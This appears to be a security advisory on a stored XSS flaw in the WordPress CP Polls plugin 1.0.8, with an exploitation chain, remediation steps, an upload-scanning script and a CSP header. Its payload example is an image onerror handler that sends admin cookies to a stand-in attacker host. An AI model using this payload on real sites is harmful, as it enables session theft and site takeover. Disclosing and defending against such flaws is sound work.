Executive Summary
A persistent cross-site scripting (XSS) vulnerability has been identified in the WordPress CP Polls plugin version 1.0.8, tracked as CVE-2016-20066 with a CVSS score of 7.2 (High). The flaw stems from insufficient sanitization of user-supplied file content during the file upload process, allowing authenticated attackers to inject persistent JavaScript payloads that execute in the browsers of site administrators and other users.
The vulnerability was disclosed to the National Vulnerability Database (NVD) on June 15, 2026, although the affected code dates from the 2016 era.
Vulnerability Details
| Field | Detail |
|---|---|
| CVE ID | CVE-2016-20066 |
| CVSS Score | 7.2 (High) |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | Low (authenticated user) |
| User Interaction | Required (admin views malicious content) |
| Scope | Changed |
| Affected Software | WordPress CP Polls Plugin 1.0.8 |
Technical Analysis
The CP Polls plugin for WordPress fails to adequately sanitize file content submitted through its upload interface. An attacker who has obtained minimal plugin access can upload a file containing embedded HTML event handlers — such as onerror attributes within image tags or script elements disguised within allowed file types.
When a site administrator or privileged user views the uploaded content through the WordPress administration panel, the injected script executes in their browser context. Because the script is stored server-side, the attack is classified as stored (persistent) XSS, making it more dangerous than reflected variants.
Attack Vector
A typical exploitation chain looks like this:
- Attacker registers or gains a low-privilege account on a WordPress site running CP Polls 1.0.8
- Attacker crafts a file with embedded JavaScript (e.g., an image with a malicious onerror attribute)
- The plugin stores the file without sanitization
- An administrator views poll submissions or media — the script executes in the admin's browser
- The attacker can steal session cookies, redirect the admin, or perform actions on their behalf
Payload Example
```html
<img src="x" onerror="fetch('https://attacker.example/steal?c='+document.cookie)" />
```

When embedded in an accepted file format and uploaded through the plugin, this payload fires whenever the affected content is rendered in a browser that has not stripped the event handler.
Impact
Successful exploitation can lead to:
- Session hijacking: Theft of administrator authentication cookies, granting full site control
- Credential harvesting: Injected keyloggers or fake login overlays
- Malware distribution: Defacement or script injection targeting site visitors
- Privilege escalation: Executing admin-level actions on behalf of the hijacked session
- Persistent backdoor: Continued access even after password changes if session tokens are reused
Affected Versions
| Software | Affected Version |
|---|---|
| WordPress CP Polls Plugin | 1.0.8 and earlier |
Remediation
Immediate Actions
- Disable or remove the CP Polls plugin until a patched version is available
- Audit recent file uploads through the plugin for suspicious content
- Review administrator session logs for unauthorized activity
- Rotate credentials for any accounts that may have been exposed
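
One way to carry out the upload audit listed above, as an added example (not code from the plugin or from this advisory). The pattern set is an assumed heuristic, the upload directory is site-specific and passed as an argument, and the sample files are constructed for the demo.

```python
import re
import sys
import tempfile
from pathlib import Path

# Assumed heuristic patterns (not from the advisory): markup that has no
# business inside an uploaded image or data file.
PATTERNS = {
    "script-tag": re.compile(rb"<\s*script\b", re.I),
    "event-handler": re.compile(rb"<[^<>]{0,500}\son[a-z]+\s*=", re.I),
    "javascript-uri": re.compile(rb"javascript\s*:", re.I),
    "active-embed": re.compile(rb"<\s*(iframe|object|embed|svg)\b", re.I),
}

def scan_bytes(data: bytes) -> list[str]:
    """Return the sorted names of every pattern found in the raw content."""
    return sorted(name for name, rx in PATTERNS.items() if rx.search(data))

def audit_uploads(root: str, max_bytes: int = 5_000_000) -> dict[str, list[str]]:
    """Walk an upload directory and map relative file path -> findings."""
    report, base = {}, Path(root)
    for path in sorted(base.rglob("*")):
        if path.is_file():
            with path.open("rb") as fh:
                hits = scan_bytes(fh.read(max_bytes))  # cap read size per file
            if hits:
                report[path.relative_to(base).as_posix()] = hits
    return report

def demo() -> dict[str, list[str]]:
    """Constructed samples: a clean text file and a fake JPEG carrying markup."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "clean.txt").write_bytes(b"Poll answer: option 2, on = off\n")
        Path(tmp, "avatar.jpg").write_bytes(
            b'\xff\xd8\xff\xe0JFIF<img src="x" onerror="void(0)" />')
        return audit_uploads(tmp)

if __name__ == "__main__":
    # Usage: python audit_uploads.py <upload-dir>; without an argument, run the demo.
    result = audit_uploads(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for name, hits in result.items():
        print(f"{name}: {', '.join(hits)}")
```

A hit is a lead for manual review, not proof of compromise: binary files can match by chance, and markup that is encoded or split across fields will not match.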
Long-Term Mitigations
- Implement a Content Security Policy (CSP) header to restrict inline script execution:

  ```
  Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';
  ```

- Regularly audit installed plugins and remove unused or unmaintained ones
- Keep all WordPress plugins updated and subscribe to security advisories
- Consider a Web Application Firewall (WAF) to filter XSS payloads in transit
CVSS 3.1 Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N